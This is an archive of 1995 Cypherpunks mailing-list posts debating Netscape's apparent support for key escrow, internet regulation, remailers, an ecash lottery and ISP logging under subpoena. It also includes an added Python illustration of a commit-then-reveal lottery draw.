In-Reply-To: <9511301947.AA05400@zorch.w3.org>
Message-ID:

On Thu, 30 Nov 1995 hallam at w3.org wrote:

>
> > a very credible white paper is circulating for the WTO to establish an
> >internet CZAR to regulate the Internet and level the playing field world
> >wide.
>
> > personally, the Feds and the FCC are bad enough --now they want to
> >have a **global** bureaucracy play god -???
>
>
> Depends on what the role of the Czar is. If it is to stop silliness like
> border disputes and keep national governments out of the loop then it
> could be a good thing. If they want to regulate it is a bad thing.
>

1. unfortunately, the state intent is to regulate.

2. have you ever seen a bureaucracy that does not turn to regulation once it has the power? (unless they were asleep )

> WTO is mainly known for the GATT which they brokered. This is basically
> an agreement amongst national governments to be "hands off" in their
> tariff regulations.
>

but WTO is also accumulating a rather larger bureaucracy and is challenging Uncle Sam on several major unilateral actions. They will have the power of international courts which, today, the U.S. can ignore, but at great international bad publicity in a time where we have few enough friends as it is --if the U.S. slips into the abyss which the incompetent beltway maggots have been building for 50 years, the US' current "friends" will be first in line to screw us over --and it will be by the WTOs and world courts, or the Rockefeller NWO --read UN, and UN troops in America.
As slippery and somewhat slimy as Gingrich is, so far he has been the only one to put his career on line admitting to the fact the current overstuffed bureaucracy *does not work* --now, if he could get a clue other than get the government out of your nose and really deliver (impossible given Clinton's retrenchment in Fair Deal idealism)....

> There is the potential for governments to regulate the Internet. It is
> in everyone's interest to keep hands off but if one starts to regulate
> then it is in others interests to regulate. The general solution to
> prisoners dilemma games is to form some type of alliance. It is not
> possible to form alliances in classical prisoners dilemmas since they
> are restricted to a single dilemma at a time. Governments are involved
> with multiple dilemmas and hence have multiple agreements. The main reason to
> keep a treaty is that the credibility of government depends on keeping
> treaties. Thus a treaty can solve a prisoners dilemma problem since
> the gain from breaking one treaty is more than offset by the potential loss
> through other sides abrogating other treaties.
>
>
> I suspect that the role of an Internet Czar would be mainly ensuring that
> fat Internet pipes arrived throughout the third world. George Sorros has
> been very active in this area, he paid for much of the infrastructure
> development into Eastern Europe. If we could persuade Bill Gates that his
> mission in life was to cable Africa to the Internet somehow we might have the
> whole planet online before 2000.
>
> I would not be too worried about WTO banning crypto or attempting looney
> tune ideas like insisting on OSI protocols. The UN generally does some very
> worthwhile work in allocating radio frequencies and such like and has done so
> for many years without problems. They allocate areas of the Clarke belt for
> satellites and do all sorts of mundane tasks.
>
>
> One of the odd things about power is that the larger the scale the more mundane
> the decisions. At the local level councillors decide to build or close schools
> and hospitals. At the global level negotiations are held on the size of holes in
> fishing nets and the exact specifications of ball bearings.
>
> If people want to see the Federal government weakened in power the only way to
> do so is to make it cede power both upwards and downwards. A national speed
> limit may be a bad idea (I personally think what was wrong was 55mph) but
> national standard roadsigns is a good idea. International standard roadsigns are
> a better idea still.
>

amen for international road signs --go metric! join the living! go 24 hour clocks and not be lost in the rest of the world! and, while we're at it, let's use universal time! yeah, right! this one I can see.

>
> Phill.
>

From tcmay at got.net Thu Nov 30 13:49:35 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 05:49:35 +0800
Subject: Netscape, Corporations, and GAK Support
Message-ID:

At 8:08 PM 11/30/95, hallam at w3.org wrote:
>Folks, lay off Netscape on this one. _EVERYONE_ is doing Terissa for the feds to
>use themselves. There are reporting requirements (FOI) which most people
>on this
>list seem to enjoy which make the privacy issue moot. There are other
>people who do
>not want to have non escrowed data flowing over their internal nets, nuclear
>installations etc.

Ah, but Jim Clark's comments were as follows, and indicate that the issue is the _government_ reading _private Net communications_:

---section of interview or speech with/by Jim Clark of Netscape, emphasis added by me---

To secure Net communications, the government will need to have access to private data exchanges
^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
using what is known as a key escrow security system, said Clark.
He added that an invincible security system for the Net is possible, but such a system won't be built unless the government
^^^^^^^^^^
has a stake in it. "That's where key escrow comes in," said Clark.

Key escrow is a controversial security system advocated by the Clinton administration that gives the government access to private Net communications. It uses public key cryptography, a system
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
in which messages are coded and decoded using a set of private and public keys. In key escrow, the private key is held by both the individual or group and the government. The government can
^^^^^^^^^^^^^^^^^^
use the key ostensibly to read messages for intelligence and national security reasons.

---end of section---

This is not then just an issue of supporting voluntary key escrow for corporations, nuclear installations, germ warfare labs, and the Church of Scientology, this is GAK, pure and simple.

Phill, very few of us are opposed to the voluntary use of escrow schemes. I, myself, would be interested in a robust system wherein my lawyer, for example, could have a "duplicate key" to some of my files. We have discussed this issue many times.

Truly voluntary key escrow means that the criteria described above by Jim Clark, that government access to private communications is "where key escrow comes in," would be impossible to achieve. Clearly, the type of key escrow being supported by Jim Clark, Dorothy Denning, David Sternlight, Stuart Baker, and others is hardly voluntary.

>Key escrow is not bad in itself. It is the idea that individuals be forced to
>use it for private conversations that is the bad idea.

Carefully read Jim Clark's direct quotes and the views attributed to him in the article.

>
>If people want to argue "make the technology available and it will be
>abused" then
>let them. Just remember that we normally argue the other side of the case.

No, the issue is that the proposal is explicitly GAK, not a voluntary system.
Details of deployment are of course murky, and this firestorm may help to kill it for now, but the issue is clearly that Jim Clark is saying the government needs to be able to read private communications and that key escrow is needed. Given that he is the Chairman of Netscape, this is worrisome.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From raph at c2.org Thu Nov 30 13:50:28 1995
From: raph at c2.org (Raph Levien)
Date: Fri, 1 Dec 1995 05:50:28 +0800
Subject: Getting a copy of the Jim Clark speech
Message-ID: <199511302041.MAA19507@infinity.c2.org>

I called Netscape public relations. Here's what I found out:

1. Netscape PR does not keep transcripts, etc., of Jim Clark's speeches.

2. You can order a tape of the speech from Conference Copy for $12. Their phone number is +1 (717) 775 0580. Be advised, though, that it will take three weeks.

If we are lucky, an amateur recording technician (trained by the Grateful Dead, perhaps?) will come out of the woodwork before then. Failing that, maybe a Fair Witness was there and is willing to speak.

Raph

From anonymous-remailer at shell.portal.com Thu Nov 30 14:03:22 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 1 Dec 1995 06:03:22 +0800
Subject: List of reliable remailers
In-Reply-To: <199511301739.JAA13160@jobe.shell.portal.com>
Message-ID: <199511302053.MAA27611@jobe.shell.portal.com>

Apologies for following up on my own post, but I did some digging and found out what I needed to know.

> > Groups of remailers sharing a machine or operator:
> > (robo syrinx c2)
> > (flame hacktic replay)
> > (alumni portal)
>
> Anything more specific on the above info?

It turns out that this information is only intended for automatic chain selection, not as a capsule history of the remailers. But see below.

> robo, syrinx, c2 all running on c2.org
> alumni, portal run by Hal Finney
> hacktic, replay run on xs4all / by Alex de Joode?
>
> ok so far, but flame is xs4all/de Joode as well?

In fact, yes, at least until Tomaz gets good enough Net access in Slovenia to support a remailer.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.

From DR940788 at caper1.uccb.ns.ca Thu Nov 30 14:03:45 1995
From: DR940788 at caper1.uccb.ns.ca (BlackHeart)
Date: Fri, 1 Dec 1995 06:03:45 +0800
Subject: query...
Message-ID: <199511301707073141.DR940788@caper1.uccb.ns.ca>

Reply to: DR940788 at caper1.uccb.ns.ca

I am currently putting together an e-zine covering computer security issues, non-mainstream music, and basically anything else people want to write about. This is an open query for submissions of any kind. Here are good examples of what I will consider putting into the zine :

---------
Good chance of getting in:

a. interviews, quotes, etc. from "net personalities", writers, band members, people with interesting computer-related jobs/hobbies/etc.
b. people involved in the field of computer security on either side of the wall, hackers, phreaks, system admins, police, etc. and their tales
c. reviews of independent, or non-mainstream software, movies, music, etc.
d. any kind of new digital tech. that is interesting and unique, a description and review
e. basically anything else that is related to the information age, digital, cyber (even though i hate the word), 'net related, etc.

---------
NO chance of getting in:

a. political views/essays which are not a concern of the computer and/or net community
b.
fiction of ANY sort (sci-fi, cyberpunk, etc, etc.)
c. anything else not related to alternative or "tech" field (ex - reviews of mainstream albums, movies, etc., also articles on things such as the environment and gay rights will be turned away, simply because this is not what the magazine is aiming for)

---------
If you have an album, tape, CD, software, device, etc. you want reviewed, send it along to :

Terminal Obsession
P.O. Box 831
Sydney, Nova Scotia
CANADA B1P 6T7

If you are interested in subscribing to the completed 'zine, wait until you see an announcement, as the zine is not complete as of yet, and may not be for a short while, so i have nothing to send you yet!

From iagoldbe at calum.csclub.uwaterloo.ca Thu Nov 30 14:13:29 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 1 Dec 1995 06:13:29 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300621.WAA26406@netcom14.netcom.com>
Message-ID: <49l62m$4dl@calum.csclub.uwaterloo.ca>

In article <199511300621.WAA26406 at netcom14.netcom.com>, Bill Frantz wrote:
>At 20:38 11/29/95 -0800, Timothy C. May wrote:
>>Have to be _very_ careful here. A variety of scams can be developed which
>>show lots of "small" winners, but which fail to show any large winners. The
>>lottery operators can make a lot of extra bucks by simply not paying off
>>the large winnings, in various ways.
>
>With complete anonymity, the scam I would think of first is giving other
>nyms of myself all the big payoffs.
>

But with complete anonymity, no player knows who else is playing, let alone who won. So if you were going to pay off yourself, you may as well just pay off no one.

The idea behind my proposal was that any participant can determine if he has won. The winning number (a hash of which was published beforehand, as in a "bit commitment" scheme) is announced. Anyone who picked a number that, say, matched in the last digit, wins $2. If you matched the last two digits, you win $10, etc.
The house (without sacrificing reputation) can't arrange who the big payoffs will go to, nor can it (as I think Tim suggested) give out lots of small prizes and no big ones.

- Ian

From vinnie at webstuff.apple.com Thu Nov 30 14:26:24 1995
From: vinnie at webstuff.apple.com (Vinnie Moscaritolo)
Date: Fri, 1 Dec 1995 06:26:24 +0800
Subject: Netscape gives in to key escrow
Message-ID:

GAK or is it Gack!!!

You know, one possible solution lies in the direction of Apple's CyberDog. It is based on OpenDoc and should be portable to windoze, I hate to say Rah told you so but...

Even with all the ITAR silliness, even if on the contingency that Apple can't provide a SSL or whatever in their HTML part, YOU can always write your own HTML part, (it's just not that complicated) in the Cyberdog environment and override the Apple CyberDog HTML part.

This looks like a great opportunity for some Cypherpunks to write code, and code that people DO care about.. a CypherPunk CyberDog part to replace the Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)

(lawyer types beware: This is definitely my opinion and you and I both know Apple is old enough to speak for itself.)

-------------
Vinnie Moscaritolo
Apple DTS Sniper
"One Shot..One Kill"
http://webstuff.apple.com/~vinnie/
Fingerprint = 4F A3 29 81 50 E4 04 F2 78 25 01 87 6E A2 14 6A
--------------

From jim at acm.org Thu Nov 30 14:31:23 1995
From: jim at acm.org (Jim Gillogly)
Date: Fri, 1 Dec 1995 06:31:23 +0800
Subject: Getting a copy of the Jim Clark speech
In-Reply-To: <199511302041.MAA19507@infinity.c2.org>
Message-ID: <199511302124.NAA26868@mycroft.rand.org>

> Raph Levien writes:
> I called Netscape public relations. Here's what I found out:
> 1. Netscape PR does not keep transcripts, etc., of Jim Clark's speeches.
> 2. You can order a tape of the speech from Conference Copy for...

Good initiative, but we needn't wait for 6 weeks to get a copy of it.
All that needs to happen is for Jim Clark to explain what he meant, if it's different from what was reported. No need for all the to-ing and fro-ing.

Perhaps what he meant was simply reiterating the announcement of October when they said they'd support the TESSERA crypto API. If it's worse than this, he should explain what's going on. If not, October was the time to get excited rather than now.

Waiting with bated breath...

Jim Gillogly
Highday, 10 Foreyule S.R. 1995, 21:24

From aleph1 at dfw.net Thu Nov 30 15:06:02 1995
From: aleph1 at dfw.net (Aleph One)
Date: Fri, 1 Dec 1995 07:06:02 +0800
Subject: Netscape gives in to key escrow
In-Reply-To:
Message-ID:

On Thu, 30 Nov 1995, Vinnie Moscaritolo wrote:

> Even with all the ITAR silliness, even if on the contingency that Apple
> can't provide a SSL or whatever in their HTML part, YOU can always write
> your own HTML part, (it's just not that complicated) in the Cyberdog
> environment and override the Apple CyberDog HTML part.
>
> This looks like a great opportunity for some Cypherpunks to write code, and
> code that people DO care about.. a CypherPunk CyberDog part to replace the
> Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)

Well if we're gonna go that way just use HotJava and create your own protocol and content handlers. They are d/l dynamically. Just as an example: write a pop3 protocol handler, then use the URL pop3://mail.host.com/loginname to get your mail. Oh what's that? Someone sent you an application/pgp message? Well, guess the pgp content handler will have to take care of that.

It's really a shame that Sun hasn't released HotJava with the JDK; it could give netscape a sun for its money.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From tcmay at got.net Thu Nov 30 15:10:39 1995
From: tcmay at got.net (Timothy C.
May)
Date: Fri, 1 Dec 1995 07:10:39 +0800
Subject: Netscape, Corporations, and GAK Support
Message-ID:

At 10:09 PM 11/30/95, Timothy C. May wrote:

>To secure Net communications, the government will need to have access to
>private data exchanges
> ^^^^^^^^^^
>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Sorry about the misaligned text and emphasis marks--it looked OK when I was composing the message, but some hidden characters must've been present when I cut-and-pasted the Clark text.

I think you all get the gist, though.

--Tim

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA               | knowledge, reputations, information markets,
Higher Power: 2^756839       | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Thu Nov 30 15:24:18 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 07:24:18 +0800
Subject: CyberDog?
Message-ID:

At 9:16 PM 11/30/95, Vinnie Moscaritolo wrote:

>You know, one possible solution lies in the direction of Apple's CyberDog.
>It is based on OpenDoc and should be portable to windoze, I hate to say Rah
>told you so but...
>
>Even with all the ITAR silliness, even if on the contingency that Apple
>can't provide a SSL or whatever in their HTML part, YOU can always write
>your own HTML part, (it's just not that complicated) in the Cyberdog
>environment and override the Apple CyberDog HTML part.
>
>This looks like a great opportunity for some Cypherpunks to write code, and
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>code that people DO care about.. a CypherPunk CyberDog part to replace the
>Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)

Go for it, Vinnie! Let us know how it works out.
Being at Apple, I presume, you're in a position to do what you suggest.

The problem of course is that many, many pieces of code "need" to be written: several projects mentioned on this list frequently could use more coders. Integrating the casual work of volunteers is usually hard to do.

If the idea is really a good one, and will result in an interesting product, then probably the best approach is for someone to do more than just volunteer some free time: he should set out to build a product he can sell or at least get some recognition for. (A la Eudora, Stuffit, Red Ryder, etc.)

I'm a Mac user, but am taking a wait-and-see approach to this "CyberDog" (dumb name!) thing. If it works out, great. But until OpenDoc (and the alphabet soup of object standards like Ole, Bento, DOE, SOM, etc.) appears in real products and demonstrates usefulness, I don't see a rush of folks moving from Windows and Unix platforms to the Mac to develop it.

If CyberDog is really a decent Web browser--and I've heard some good things about it, admittedly from Macintosh partisans--then many of us will probably use it.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA               | knowledge, reputations, information markets,
Higher Power: 2^756839       | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From corey at netscape.com Thu Nov 30 15:33:08 1995
From: corey at netscape.com (Corey Bridges)
Date: Fri, 1 Dec 1995 07:33:08 +0800
Subject: Netscape gives in to key escrow
Message-ID: <199511302245.OAA00266@netscape.com>

Speaking for me and not Netscape:

I am not in favor of governmental key escrow. Getting that news yesterday made for the worst day I've had in a while.
However, I think that history will look back on this period and snicker. "They thought they could pull off key escrow? Yeah, right." I think that things are going to get pretty ugly over the next few years, but ultimately, it's too late. The genie's out of the bottle.

I'm not going to say "Don't give up on Netscape." Do what you feel you should. *I'm* not giving up on Netscape, however. We haven't adopted this as a company position, and besides, I think I can do more good on the inside than on the outside.

In a related matter, there was talk a couple days back about creating a PGP plug-in for Netscape Navigator. I've actually been thinking about that for a couple months, but I make a much better writer than a programmer. (And if you've ever read any of my books, keep your jokes to yourself.) Anyway, if people out there are interested in doing the real work on such a product, I'd be more than willing to help with the documentation, UI, and other things where I have a modicum of talent. I'd also put a copy of it on my home page and hype it internally. In an unofficial capacity, natch.

Corey Bridges
Security Documentation Manager
Netscape Communications Corporation
415-528-2978

From KJC at cityscape.co.uk Thu Nov 30 15:34:38 1995
From: KJC at cityscape.co.uk (KJC)
Date: Fri, 1 Dec 1995 07:34:38 +0800
Subject: GAKzilla & British MPs
Message-ID: <199511302239.WAA16631@ns.cityscape.co.uk>

>
>
>On Thu, 30 Nov 1995, KJC wrote:
>
>> for ages - I give up!.- BTW- after 'Britland' MPs posted here a while back
>
>Interesting, that must have been during one of my sanity vacations from the
>list. Do you remember approx. when or maybe what their names were?
>Might make it easier to hunt it down in the archives.
>Thanks.
>
>You know it's really strange, the only people around here I've found
>interested in crypto and aware of sci.crypt and this list were government
>spooks. I even sold my 1st edition Applied Crypto to one.
>Friendly people, but totally discouraging.
>
>> I thought _maybe_ we'd hear more. Will the last one to leave Grate Britain
>> please switch out the lights!
>> kc
>At least you have better weather.
>
>

I think it was around March '95. Adam Back(?) cross-posted an email from sci.crypt (written by Chris Smith and concerning Cambridge (U.K.) MP Anne Campbell). At some point Campbell posted to the list herself(?) Sorry, I'm not very clear on this but for some reason I always thought she wasn't the only MP involved. Yadayadayada... they're a bit like London buses- nothing for hours then 3 or 4 arrive at the same time...

I've posted this to the list 'cause maybe someone can update the story... I'd _still_ like to know if there has been any discussion (by MPs) since then.

Sorry about the bandwidth

kc

p.s. Weather better now it's been sold to the French.

From dl at hplyot.obspm.fr Thu Nov 30 15:43:30 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 1 Dec 1995 07:43:30 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300621.WAA26406@netcom14.netcom.com>
Message-ID: <9511302253.AA04389@hplyot.obspm.fr>

'small' questions about inet gambling

+ How do you complain that you didn't get your win without revealing your ID ?
+ Alternatively, How do you prevent false complaints or nasty competitors trying to trash gambling co reputation ?

regards

ps: it would be easier that the game is legal so ppl can play without being hidden... In my current casino, most people do complain when there is a problem, and I think that those who don't aren't because it's monopoly money or just they aren't paying much attention...

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven
jihad Ortega Qaddafi Legion of Doom South Africa KGB Uzi

From tcmay at got.net Thu Nov 30 16:10:50 1995
From: tcmay at got.net (Timothy C.
May)
Date: Fri, 1 Dec 1995 08:10:50 +0800
Subject: Netscape's Delicate Balancing Act
Message-ID:

The market valuation of Netscape Communications is not specifically a Cypherpunks topic, though many of us are interested in it, and/or use Netscape. But there are some issues about Netscape's future product plans which may affect market valuation, and which also could hinge on PR issues like Jim Clark's apparent support for mandatory key escrow.

To wit, Netscape is currently valued at $5 billion or so, despite having essentially no revenues or profits (sure, it has a little of each, but not much). This is more than the market capitalization of many sizable, respected companies. Companies like General Dynamics, Apple Computer, CBS (which was just sold to Westinghouse for $5B).

Granted, Netscape investors are betting on the come. (And contrary to what someone said, investors in companies like Netscape are not mostly interested in profits. Rather, they are interested in selling at a higher price, for whatever reason. This is also known as the "greater fool" theory: that no matter how high the price of a stock, there is some greater fool who will buy it at a higher price. Of course, the corollary to the greater fool theory is that there is usually a greatest fool.)

So, can Netscape keep a $5 billion valuation? (And more to the point, can it double from where it is now, say, and sustain a $10 B valuation? I am skeptical, personally, but I've been wrong before.)

What Netscape has to offer is based on a *public* standard, the Web and all the various pieces that so many companies are supporting. Netscape's _server_ market--which is said to be where the revenues are mostly coming from--is likely to face heavy competition. As is the browser, of course. (Spyglass Mosaic, Ravi's company, HotJava, CyberDog, MacWeb, and a bunch of others).

Scenario #1: Netscape sticks to an open standard.
Hard to see what keeps the valuation at $5 B with so many free browsers, free servers, low-cost servers, etc.

(From the browsing side, "brand loyalty" is probably minimal: I've used several browsers, and currently use Netscape 1.1N for _some_ of my Web needs. I'll switch "on a dime" to another browser if it offers features I like. Others I have talked to feel the same way. I think "loyalty" to a particular browser is close to nil. Much less than loyalty to a text editor, for example.)

Scenario #2: Realizing this, Netscape seeks to "differentiate itself" by proprietary technology. "'Nuff said."

I can't see any means of "proprieterizing" the Web that Netscape could hang on to. Any good ideas will be quickly copied or reverse-engineered by other companies and groups. Unlike a chip company, with various and complicated secrets tied up in internal chip design data bases and in billion-dollar fabrication plants, what could a browser or server really keep secret?

Unlike a company like Adobe, with various programs whose functionality can mostly be protected from copying by use of copyright laws, a Web browser that operates on public standard files in standard ways will be hard to protect. (Ironically, Netscape's valuation is significantly higher than Adobe's, and Adobe had something like $700 million in yearly sales and $100+ million in profits.)

So, it is my thesis that "brand loyalty" to Netscape is ephemeral, that users will flock to the Next Whizzy Thing faster than you can say "price collapse."

The connection with crypto and key escrow is that any bad publicity, any hint that Netscape is signing-on to be an agent for Big Brother, could hasten this conversion. While I would never, ever suggest to anyone that the sticker idea I devised a few years ago--"Big Brother Inside"--be applied here, I can imagine others will.

Netscape is in a very delicate balancing act. Jim Clark may turn out to be the Karl Wallenda of the Web (with no Net to catch him).
--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA               | knowledge, reputations, information markets,
Higher Power: 2^756839       | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From nobody at REPLAY.COM Thu Nov 30 16:13:13 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 1995 08:13:13 +0800
Subject: nonetest
Message-ID: <199511302254.XAA09438@utopia.hacktic.nl>

12890 87221 56907 00458 94225 40838 75693 98239 87802 85834 98347 49857 21349 12038 14896 09343 87458 98589 32759 74545

From bdavis at thepoint.net Thu Nov 30 16:14:48 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Fri, 1 Dec 1995 08:14:48 +0800
Subject: "Got a subpoena?"
In-Reply-To: <199511301946.LAA12448@infinity.c2.org>
Message-ID:

On Thu, 30 Nov 1995, sameer wrote:

> >
> > What about a court order to (a) start comprehensive logging, and (b) not
> > tell anyone under penalty of ______ .

I am unaware of any authority for such an order.

> Aren't court orders part of the public record? I don't quite

Yes, but court orders can be sealed pending further order of the court.

> know how this would work. I don't think they can keep me from telling
> people that I've started comprehensive logging, or at least keep it
> from being found out. (Legally, that is. I'm sure they could always
> use an approach like threatening to audit me every year, threatening
> my family, etc.)
>
> --
> sameer Voice: 510-601-9777
>

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!
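
Ian Goldberg's ecash lottery message earlier in this archive describes publishing a hash of the winning number beforehand so that every player can check their own ticket. As an added illustration (not part of any poster's message), here is that commit-then-reveal draw in Python. SHA-256, the 32-byte nonce, six-digit tickets and the prize tiers above $10 are assumptions of this example; the nonce is included because a bare hash of a short number can be recovered by enumeration, which the last function shows.

```python
"""Commit-then-reveal lottery draw (added illustration, not code from the thread)."""
import hashlib
import secrets

NONCE_LEN = 32  # bytes of house randomness mixed into the commitment (assumption)

# Prize in dollars for matching the last k digits. The $2 and $10 tiers come
# from the message; the higher tiers are constructed for this example.
PRIZES = {0: 0, 1: 2, 2: 10, 3: 100, 4: 1000, 5: 10000, 6: 100000}


def commit(winning: str, nonce: bytes) -> str:
    """Hash the house publishes before any ticket is sold."""
    if len(nonce) != NONCE_LEN:
        raise ValueError("nonce must be NONCE_LEN bytes")
    if not (winning.isascii() and winning.isdigit()):
        raise ValueError("winning number must be a decimal string")
    # Fixed-length nonce first, so the split between nonce and number is unambiguous.
    return hashlib.sha256(nonce + winning.encode("ascii")).hexdigest()


def house_draw(digits: int = 6):
    """House side: choose number and nonce; only the commitment is published now."""
    winning = f"{secrets.randbelow(10 ** digits):0{digits}d}"
    nonce = secrets.token_bytes(NONCE_LEN)
    return winning, nonce, commit(winning, nonce)


def verify_opening(commitment: str, winning: str, nonce: bytes) -> bool:
    """True only if the announced (winning, nonce) pair opens the published hash."""
    try:
        return commit(winning, nonce) == commitment.lower()
    except ValueError:
        return False


def matched_suffix(ticket: str, winning: str) -> int:
    """Number of trailing digits the ticket shares with the winning number."""
    count = 0
    for t, w in zip(reversed(ticket), reversed(winning)):
        if t != w:
            break
        count += 1
    return count


def payout(ticket: str, commitment: str, winning: str, nonce: bytes) -> int:
    """Player side: reject a result that does not open the earlier commitment."""
    if not verify_opening(commitment, winning, nonce):
        raise ValueError("announced number does not match the published hash")
    if len(ticket) != len(winning) or not ticket.isdigit():
        raise ValueError("ticket must be a decimal string of the draw's length")
    return PRIZES[min(matched_suffix(ticket, winning), max(PRIZES))]


def unsalted_commit(winning: str) -> str:
    """Weak variant for comparison: a bare hash of the number, no nonce."""
    return hashlib.sha256(winning.encode("ascii")).hexdigest()


def recover_unsalted(commitment: str, digits: int):
    """Why the nonce matters: every candidate number can simply be hashed and compared."""
    for n in range(10 ** digits):
        guess = f"{n:0{digits}d}"
        if unsalted_commit(guess) == commitment:
            return guess
    return None


if __name__ == "__main__":
    winning, nonce, published = house_draw()
    print("published before the draw:", published)
    print("announced after the draw: ", winning, nonce.hex())
    for ticket in ("000000", winning[:3] + "000", winning):
        print(ticket, "wins $%d" % payout(ticket, published, winning, nonce))
```

The commitment only fixes the number after publication; it does not show that the house chose it at random or that it will pay, which is where the reputation argument in the thread comes in.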
From JonathanZ at consensus.com Thu Nov 30 16:20:16 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Fri, 1 Dec 1995 08:20:16 +0800
Subject: "Got a subpoena?"
Message-ID:

At 11:46 AM 11/30/95, sameer wrote:
>>
>> What about a court order to (a) start comprehensive logging, and (b) not
>> tell anyone under penalty of ______ .
>
> Aren't court orders part of the public record? I don't quite
>know how this would work. I don't think they can keep me from telling
>people that I've started comprehensive logging, or at least keep it
>from being found out. (Legally, that is. I'm sure they could always
>use an approach like threatening to audit me every year, threatening
>my family, etc.)

In fact, most forms of recording need willing participation by at least one party. Wiretaps are the main method of recording information which doesn't involve willing participation of one of those communicating. Since there are no laws regarding participation of service providers assisting the government at gathering information, there is a great deal of leeway legally.

If they actually pass a law (as in Penn) regarding ISP obligations it'll probably be fought a bit, but does then put more stress on the situation.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick Consensus Development Corporation..
.. 1563 Solano Ave, #355..
.. Berkeley, CA 94707-2116..
.. o510/559-1500 f510/559-1505..
..Mosaic/WWW Home Page: ..
.. Consensus Home Page ..

From rmartin at aw.sgi.com Thu Nov 30 16:31:39 1995
From: rmartin at aw.sgi.com (Richard Martin)
Date: Fri, 1 Dec 1995 08:31:39 +0800
Subject: UK Labour Party policy on encryption
Message-ID: <9511301846.ZM3820@glacius.alias.com>

-----BEGIN PGP SIGNED MESSAGE-----

[see http://www.poptel.org.uk/labour-party/policy/info-highway/content.html for full text]

> It is important that privacy is rigorously protected over the
> new networks, for both personal and commercial reasons.
> We do not accept the "clipper chip" argument developed in the United
> States for the authorities to be able to swoop down on any
> encrypted message at will and unscramble it.
>
> The only power we would wish to give to the authorities, in
> order to pursue a defined legitimate anti-criminal purpose,
> would be to enable decryption to be demanded under judicial
> warrant (in the same way that a warrant is required in order
> to search someone's home).
>
> Attempts to control the use of encryption technology are wrong
> in principle, unworkable in practice, and damaging to the
> long-term economic value of the information networks. There is
> no fundamental difference between an encrypted file and a
> locked safe. A safe may be effectively impregnable in that the
> effort taken to open it would destroy the contents. An
> encryption algorithm, similarly, may be effectively
> unbreakable.

Notes. I've taken this entirely out of context*; cpunks will be glad to find that the same document manages to hit at least two of the horsemen of the infocalypse. A few paragraphs earlier is the standard "must protect women, children, and ethnic minorities" (paraphrased) argument.

Labour seems likely to form the next government. And even if they don't, their stated policy might be a good thing to take to the Tories, saying something along the lines of, "Labour has a clue, where's yours?" [Note that I was unable to find the Tory point of view.]

I found this stuff from Anne Campbell MP's home page.
http://www.worldserver.pipex.com/home/anne.campbell

* for brevity's sake.
richard

Richard Martin  I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu  http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8  Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML5COB1gtCYLvIJ1AQFZ1wP+Ox2fbOKsEbtl06GZugpB8ecHl5cGYHSQ
7sBro0QFr2v4KZOV6X435LXmAqSV8ML+BmVsT/1bnfUzsxeIQErhC0q1kQeA+hAX
h21SYfW6hN3h2L9aOtLr/1FDZkKAcXGDNFkvq/weKQdxCbtTw0Nl1ZQym3oaYdhT
MrjKi85fU44=
=CeYH
-----END PGP SIGNATURE-----

From anonymous-remailer at shell.portal.com Thu Nov 30 16:39:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 1 Dec 1995 08:39:10 +0800
